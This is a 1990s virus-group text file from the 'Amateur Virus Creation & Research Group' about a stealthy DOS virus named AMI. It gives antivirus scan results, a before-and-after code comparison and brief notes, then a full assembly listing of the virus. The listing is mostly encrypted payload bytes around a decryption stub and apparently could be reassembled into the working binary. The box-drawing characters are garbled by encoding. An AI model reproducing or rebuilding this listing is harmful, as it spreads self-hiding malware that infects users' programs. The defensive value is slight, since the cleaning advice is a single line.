������� � � ��������� � �������� � � � � � ��� �� � � � � � � �� ����������� � � � � � � � � � � � � � � � � � � ������ ��������� � ��� ��� ���� ������� ���� �������� � � � ������� � ��� � � � � � � �� � �� � � � � � � � ���� � � �� � � � � ����� � � �������� � �� �������� �� � � � � � � � � � ������� � � �������� � � �� ������� Distributed By Amateur Virus Creation & Research Group (AVCR) Researched By MAS ����������������������������������������������������������������������������� Name: The AMI Virus ����������������������������������������������������������������������������� Alias: NONE ����������������������������������������������������������������������������� Type of Code: Unknown, but probably memory resident. ����������������������������������������������������������������������������� Antivirus Detection: (1) ThunderByte Anti Virus (TBAV) reported AMI.COM as: "probably infected by an unknown virus. No checksum / recovery information (Anti-Vir.Dat) available. Suspicious file access. Might be able to infect a file. Suspicious Memory Allocation. The program uses a non-standard way to search for, and/or allocate memory. Found a code decryption routine or debugger trap. This is common for viruses but also for some copy-protected software. The program traps the loading of software. Might be a virus that intercepts program load to infect the software. Memory resident code. The program might stay resident in memory. Garbage instructions. Contains code that seems to have no purpose other than encryption or avoiding recognition by virus scanners. Undocumented interrupt/DOS call. The program might be just tricky but can also be a virus using a non-standard way to detect itself. EXE/COM determination. The program tries to check whether a file is a COM or EXE file. Viruses need to do this to infect a program. Found code that can be used to overwrite/move a program in memory. Found instructions which require a 80186 processor or above. Encountered instructions which are not likely to be generated by an assembler, but by some code generator like a polymorphic virus." (2) Frisk Software's F-Protect (F-PROT) reported AMI.COM as: "C:\AMI\AMI.COM seems to be infected with a virus. Please contact Frisk Software International to check if this is a known false alarm or send us a copy for analysis." (3) McAfee Softwares Anti Virus (SCAN.EXE) did not detect the AMI virus. (4) MicroSoft Anti Virus (MSAV.EXE) did not detect the AMI virus. ����������������������������������������������������������������������������� Execution Results: This virus is very stealthy, for no files are changed in size date or time stamp. Memory size does not change. The virus's size, date, and time before execution were: NAME SIZE DATE TIME AMI.COM 1703 12-16-93 2:40p And after execution they remained unchanged. The only noticible difference between before execution and after execution is the change in its code. Below is a comparison of the AMI virus before and after execution, the top is before execution and the bottom is after execution. _____________________________________________________________________________ ; FILE CREATED BY FILE COMPARE, ; DEVELOPED BY: ; MICRO PROFESSOR SOFTWARE, ; ALONG WITH AMATEUR VIRUS CREATION & RESEARCH GROUP. ;---------------------------------------------------------------------------- mov SI,Word Ptr var1_100 ; [602D:0100] = 0 mov SI,Word Ptr var1_100 ; [6342:0100] = 0 ;---------------------------------------------------------------------------- xor Word Ptr var1_100,SI ; [602D:0100] = 0 xor Word Ptr var1_100,SI ; [6342:0100] = 0 ;---------------------------------------------------------------------------- add DL,Byte Ptr var1_2ee ; [602D:02EE] = 0F27Fh add DL,Byte Ptr var1_2ee ; [6342:02EE] = 0F27Fh ;---------------------------------------------------------------------------- mov AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0 mov AL,Byte Ptr DS:data_8ee2; [6342:8EE2] = 6399h ;---------------------------------------------------------------------------- mov AL,Byte Ptr DS:data_792e; [602D:792E] = 0 mov AL,Byte Ptr DS:data_792e; [6342:792E] = 69A9h ;---------------------------------------------------------------------------- sbb Byte Ptr DS:data_461f,BL; [602D:461F] = 0 Subtract with borrow sbb Byte Ptr DS:data_461f,BL; [6342:461F] = 1A1Ah Subtract with borrow ;---------------------------------------------------------------------------- mov AX,Word Ptr DS:data_5f12; [602D:5F12] = 0 mov AX,Word Ptr DS:data_5f12; [6342:5F12] = 53F8h ;---------------------------------------------------------------------------- db 16h, 0A7h, 58h, 63h db 16h, 0A7h ;---------------------------------------------------------------------------- CODE_SEG_1 ends var1_7a5 db 58h, 63h ;---------------------------------------------------------------------------- CODE_SEG_1 ends ;---------------------------------------------------------------------------- end start ;---------------------------------------------------------------------------- end start ;---------------------------------------------------------------------------- ; END OF FIRST FILE, EXTRA CODE IS FROM SECOND FILE ����������������������������������������������������������������������������� Cleaning Recommendations: Remove from memory and delete infected files. ����������������������������������������������������������������������������� Researcher's Notes: The AMI virus is very stealthy, for there are no ways, other than a virus detector, to notice the virus. When the virus is first run there is no way to realize that it has been run, for there is no character displaying, speaker noise, etc. ����������������������������������������������������������������������������� ----------------------------------------------------------------------------- Disassembly of the AMI Virus BEFORE Execution ----------------------------------------------------------------------------- PAGE 60,132 data_10be = 10BEh data_16d6 = 16D6h data_2041 = 2041h data_2b9f = 2B9Fh data_2ee0 = 2EE0h data_461f = 461Fh data_50ee = 50EEh data_5d91 = 5D91h data_5f12 = 5F12h data_681b = 681Bh data_7162 = 7162h data_732e = 732Eh data_7606 = 7606h data_792e = 792Eh data_8ee2 = 8EE2h data_a1ed = 0A1EDh data_aea5 = 0AEA5h data_b400 = 0B400h data_d8db = 0D8DBh data_ee10 = 0EE10h data_eeb8 = 0EEB8h data_faa6 = 0FAA6h ;���������� CODE_SEG_1 �������������������������������������������������������� CODE_SEG_1 segment para public assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 org 100h ;������������������������������������������������������������������������������� ;� ;� ENTRY POINT ;� ;������������������������������������������������������������������������������� ;������������������������������������������������������������������������������� ;� ;� PROCEDURE proc_start ;� ;������������������������������������������������������������������������������� proc_start proc far start: ; N-Ref=0 add Byte Ptr [BX+SI],AL add DL,BH nop ; No operation nop ; No operation call near ptr proc_2 proc_start endp ;������������������������������������������������������������������������������� ;� ;� PROCEDURE proc_2 ;� ;������������������������������������������������������������������������������� proc_2 proc far pop BX sub BX,offset var1_131 mov SI,Word Ptr var1_100 ; [602D:0100] = 0 xor Word Ptr var1_100,SI ; [602D:0100] = 0 lea DI,Word Ptr var1_14d[BX]; Load effective address mov SI,682h xor Word Ptr [DI],DI xor Word Ptr [DI],SI inc DI dec SI jne loc_notfound ; Jump if not equal ( != ) aaa ; ASCII adjust for addition xor Byte Ptr [BP+DI+1Fh],CL dw 50C0h, 0C951h var1_12d db 'XPP' db 8Dh var1_131 db '`@@@' db 13h, 0BFh, 40h, 0A0h, 4Ch, 53h db 0C3h, 57h, 15h, 44h, 18h var1_140 db '" ' db 0 var1_144 db 20h, 9, 3Ah, 0DBh, 7Eh, 79h db 14h, 0CAh, 16h var1_14d dw 1110h, 10h, 0E9h db 5 dup (0) dw 1810h db 4 dup (10h) db 32h, 11h, 3, 26h, 3 var1_163 db '& ! ' db 0Ch, 0BFh db ']PPPPB@A@@TTTT' db 0B8h, 50h, 50h, 0Bh, 0D1h, 0BBh db 0F3h, 51h, 8Eh, 2Ch, 2Fh, 0F4h db 0A1h, 8Eh, 29h, 27h, 0C6h, 91h db 0BEh, 1Bh, 17h, 0C8h, 91h, 33h db 80h, 81h, 0AEh, 0Ah, 7, 0DAh db 81h, 22h, 92h, 91h, 0C3h, 24h db 0A0h, 5Dh, 0B1h, 0CBh, 9Ch, 0A2h db 0D2h, 0B1h, 18h, 5Fh, 0EBh, 93h db 0AFh, 60h, 0A5h, 9Eh, 72h, 6Eh db 1Bh, 7, 16h var1_1b1 db '6L1U' db 0B8h var1_1b6 db ']D}' db 0D8h, 0D4h, 5, 52h, 7Dh, 0ACh db 0FCh var1_1c0 db 71h, 22h, 70h loc_1: ; N-Ref=0 wait ; Wait for interrupt add DL,Byte Ptr var1_2ee ; [602D:02EE] = 0F27Fh cbw ; Convert byte to word ror Byte Ptr [BX+SI+3Dh],1 ; Rotate right call far ptr proc_1 pop Word Ptr var1_260[SI] mov BX,0FCF5h and CH,AH adc AX,9D0Dh ; ADD with carry retf ; Return FAR proc_2 endp db 92h var1_1df db '.bnV/' db 0A2h var1_1e5 db '^!j' db 7Fh var1_1e9 db '&VLT' db 0B8h, 95h, 0C3h, 5Ch loc_2: ; N-Ref=1 inc SP rcl BX,CL ; Rotate left through carry rcl BX,CL ; Rotate left through carry rcl BX,CL ; Rotate left through carry retn db 5 dup (0C3h) dw 28EBh, 2CA3h, 0ED6Dh, 652Eh dw 2B8Eh, 86A6h, 0B690h, 0A619h dw 9091h, 0BA6h, 8396h, 0A680h dw 8323h, 0B690h, 9656h, 9090h dw 0BBDDh, 0EA70h, 0A3E5h, 0E548h dw 652Eh, 0E403h, 0DB00h, 9D8Dh dw 0B71h, 0BF73h, 5746h, 0CD17h dw 8EFFh, 0DB57h, 0E9A7h, 56F5h dw 0A3ADh, 2684h, 0AFADh var1_244 db 'P"q' db 0EBh, 3Eh, 9Ch, 9Fh, 44h, 11h db 9Dh, 9Fh, 3Ah, 1, 0F3h, 0A4h db 2Eh, 8Ch, 0Eh, 36h, 0, 5Dh db 9Eh, 0D5h, 36h, 99h, 6, 13h db 10h var1_260 dw 0E606h var1_262 db '& z' db 6, 0ACh var1_268 db '^QP' db 15h, 0DEh loc_3: ; N-Ref=0 xchg BP,AX dec SI push DI dec SI pop DI int 0F7h dw 416Ah, 40FFh, 0E951h, 56F5h dw 0A3ACh, 56F4h, 0A62Dh, 0A224h dw 6BF0h, 678Eh, 0BC96h, 9090h dw 0BE90h, 9E1Ch, 8096h, 0D9Eh dw 9C96h, 8E83h, 288Fh, 0B5B1h dw 0B15Dh, 248Fh, 1ABAh, 0A020h dw 816Dh var1_2a6 db 'HSQ' db 0E5h, 7Bh, 9Ch, 70h, 0D0h, 0A8h db 95h var1_2b0 db 'F6$5k' db 0C0h, 0B8h, 0FDh, 56h, 24h, 0Ch db 4Fh, 0E9h, 79h, 64h, 9Ch, 0 db 0Fh, 0A8h, 3Fh, 1Ah, 20h, 0Fh db 0ADh, 17h, 2Ch, 10h, 0A9h, 39h db 34h, 0ABh, 33h, 6, 0Fh, 1Eh db 0CCh, 20h, 1Eh, 2Fh, 81h, 1Fh db 46h, 10h, 19h, 0FAh, 17h, 81h db 91h, 0DFh, 2Bh, 53h, 15h, 0C9h db 5Ch, 23h, 99h, 49h, 44h, 0B9h db 0D5h, 50h, 11h var1_2ee db 7Fh, 0F2h, 1Fh, 40h, 6Fh, 0E2h var1_2f4 db '!@o' db 86h var1_2f8 db 'W5PPQ' db 0E9h var1_2fe db 'Mdl' db 81h, 8Eh, 29h, 0BEh, 93h, 0A1h db 8Eh, 1Ch, 96h, 0A5h, 91h, 8Eh db 28h, 8Ch, 0B5h, 3Ah, 3Dh, 86h db 8Eh, 9Fh, 4Dh, 0A1h, 9Fh db '+Foy' db 7, 6Eh, 10h, 6Ch, 0EBh, 0D4h db 0B0h, 8Eh, 5Fh, 8Eh, 97h, 0A1h db 0EFh, 18h, 4, 7Eh, 94h var1_32d db 'VgQ' db 0CCh, 8Ah, 8Fh, 7Ch, 0BFh, 34h db 0B1h var1_337 db '|P%' db 0B8h, 0CCh, 0, 3, 1, 2 var1_340 db 'vwu&>' db 0Eh, 0A9h, 36h, 57h, 11h, 3Eh db 9Ch, 0Eh, 59h, 11h, 1Eh, 7 db 0B8h, 0, 3Dh, 0CDh var1_355 db '!rV' db 9Bh, 0C8h, 0A8h, 10h, 47h, 0DDh db 31h, 3Eh, 0A9h var1_361 db '6c!' db 0Eh, 0A9h var1_366 db '.eQ' db 0E4h loc_4: ; N-Ref=0 var1_36a db 'o^O' db 0EAh, 7Eh, 51h, 0F9h, 43h, 40h db 8Dh var1_374 db 'a2w{' db 91h, 25h, 63h, 0E8h, 52h, 12h db 63h, 99h, 93h, 72h, 6Dh, 81h db 8Eh, 3, 0EBh, 0A1h, 0BEh, 19h db 86h, 0DDh, 91h, 24h, 0AEh, 5Dh db 0A1h, 0AEh, 1, 0BEh, 0AEh, 81h db 0CDh, 0DAh, 0E5h, 93h, 79h, 57h db 90h, 0BEh, 13h, 0AEh, 0EDh, 0A1h db 0A0h, 0D7h, 0A9h, 8Eh, 21h, 9Eh db 1Bh, 56h, 6Ch, 0AEh, 21h, 54h db 0BEh, 0E4h, 47h, 69h, 0C7h var1_3b3 db 'yiF' db 0AEh var1_3b7 db 32h, 59h loc_5: ; N-Ref=0 jns loc_notfound ; Jump if no sign ( >= 0) sbb AL,56h ; 'V' Subtract with borrow push DX push CS scasb ; Scan DS:SI for byte in AL or Word Ptr [SI],BX and Word Ptr [BX+SI],CX dw 5326h, 9FC0h, 5417h, 0D239h dw 5001h, 0DA16h, 7526h, 29DCh dw 98Eh, 646h, 0E697h, 0E137h dw 30D6h, 1E63h, 269Fh, 1464h dw 0EAEEh, 5506h, 0EF92h, 6A55h db 9Ah, 76h, 25h, 0E9h, 0CCh, 9Fh db 0FFh loc_6: ; N-Ref=1 inc BP add AX,8E74h je loc_notfound ; Jump if equal ( = ) call far ptr loc_notfound and AL,4Fh ; 'O' pop DS mov AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0 sub BP,Word Ptr [BP-5E13h] mov SI,861Bh esc Byte Ptr [BP+5D91h] mov CL,24h ; '$' dw 0B3C0h, 4D49h, 6BA1h, 10A1h dw 9028h, 0A3D2h, 0A359h, 5D42h dw 0D281h, 8EB5h, 0EB01h, 0A5A1h dw 0AFAEh, 0F37Eh, 5100h, 10E4h dw 0FFAh, 0F941h, 4043h, 618Dh dw 51E8h, 7E07h, 46DBh, 5113h dw 0AB0Eh var1_442 db '.e!' db 0EDh, 1, 94h, 2Eh, 0DDh, 31h db 3Eh, 9Bh, 1Eh, 51h, 11h, 0F6h db 0C1h, 7, 75h, 5, 0F6h, 0C1h db 20h, 65h, 1Ah, 0A8h, 11h, 53h db 3Eh, 0D5h, 6, 67h, 21h, 0EDh db 1 var1_464 db '?''}' db 7Fh, 0Eh, 0Ah, 9, 0Bh, 8 db 0CDh, 0B9h, 0E2h, 0BEh var1_471 db '^N_' db 13h, 11h, 12h, 10h, 0E9h, 57h db 50h, 0EBh, 24h, 51h, 0AFh, 67h db 2Bh, 0E7h, 5Eh, 0B1h, 0A7h, 0EBh db 0EBh, 42h, 67h, 0C8h, 81h, 97h db 1Bh, 87h, 0C8h, 9Bh, 40h, 0F4h db 82h, 77h, 62h, 0Bh, 42h, 0DAh db 0C9h, 0CBh, 8Fh, 53h, 8Eh, 96h db 0C6h, 0C7h, 0F1h loc_7: ; N-Ref=0 scasb ; Scan DS:SI for byte in AL cmpsw ; Cmp word at DS:SI to ES:DI sbb AX,SP ; Subtract with borrow mov AL,Byte Ptr DS:data_792e; [602D:792E] = 0 out DX,AX ; Output to port [DX] from AX aaa ; ASCII adjust for addition push AX out DX,AX ; Output to port [DX] from AX cmp AX,0E851h pop CX inc CX mov BP,0E4B2h sbb Byte Ptr DS:data_461f,BL; [602D:461F] = 0 Subtract with borrow dec SI xchg DX,AX pop ES ;������������������������������������������������������������������������������� assume ES:nothing ;������������������������������������������������������������������������������� dec DI add BX,BX xchg DI,AX cmpsw ; Cmp word at DS:SI to ES:DI pop ES jnb loc_notfound ; Jump if not below ( >= ) xchg DI,AX and Word Ptr [BP+SI],SP jcxz loc_notfound ; Jump if CX = 0 dw 12F1h, 4B17h, 9A10h, 0E7E1h dw 5507h, 0FE00h, 1F8Fh, 59h dw 365h, 0CBABh, 0EB12h, 0B9FDh var1_4e0 db ')T(' db 89h, 20h, 54h, 0D6h, 0CDh, 0F9h db 50h, 25h, 0AAh, 0FCh, 0AAh, 0Bh db 4Eh, 1Fh, 82h, 16h, 47h, 13h db 12h, 0CAh, 99h, 0DBh, 97h, 0A7h db 77h, 3, 50h, 0E7h, 51h, 0A2h db 'bq@' db 0A3h, 0A6h, 0FAh, 0A1h, 1Bh, 68h db 66h, 96h, 0C4h, 91h, 6Fh, 1Eh db 86h, 0D8h, 81h, 0F4h, 92h, 3Ah db 5Ah, 83h var1_518 db 'j|8' db 98h, 0E5h, 99h, 38h, 91h, 0D5h db 57h, 4Ch, 8, 0A1h, 0D4h, 5Bh db 2Bh, 93h, 0FAh, 0ABh, 0Bh, 0Ah db 57h, 0Fh, 93h, 11h, 11h, 0CBh db 4Eh, 1Ch, 41h, 0A2h, 0BEh, 9 db 0B2h, 0A6h loc_8: ; N-Ref=0 or Word Ptr data_b400[BP+DI],DX xor Word Ptr [SI],DX and AL,Byte Ptr [SI] esc Byte Ptr [SI] mov Byte Ptr [BX+DI+78h],0E3h sub AL,10h dw 1A64h var1_54c db ',0d' db 16h, 3Ch, 0FFh, 74h, 2, 0F8h db 0C3h, 0F9h, 0C3h, 2Ch, 0A0h, 62h db 16h, 2Ch, 0CFh, 67h, 12h, 0D9h db 0E3h, 0D8h, 0E3h, 3Eh, 98h, 60h db 20h, 0DEh, 88h, 0ABh, 0F1h var1_56c db '' db 0EFh, 3Eh, 2Bh, 11h, 16h, 43h db 0B4h, 48h, 0BBh, 6Bh, 0, 0CDh var1_756 db '![c' db 13h, 0E9h, 17h, 0D3h, 3Eh, 0D6h db 16h db ' !!' db 0AEh, 0E0h, 2Eh, 3Fh, 13h, 0AFh db 0EEh, 50h, 51h, 0E9h, 0F5h, 56h db 0ACh, 0B3h, 0E4h, 0FFh, 63h, 40h db 0FEh var1_776 db 'cASf' db 1Bh, 51h, 0E9h, 0D2h, 56h, 76h db 91h, 95h, 86h, 91h, 0ADh, 0E7h db 0E6h, 42h, 66h, 1Eh, 48h, 24h db 0D0h, 0A3h var1_78e db 'B)%' db 86h, 4Dh, 0A1h, 1Ch, 0D0h, 34h db 0C9h, 5Dh, 0B1h, 0C8h, 0Dh, 9Eh db 8Fh, 0E2h, 2Ah, 9Bh, 61h, 0D5h db 16h, 0A7h, 58h, 63h CODE_SEG_1 ends end start �����������������������������������������������������������������������������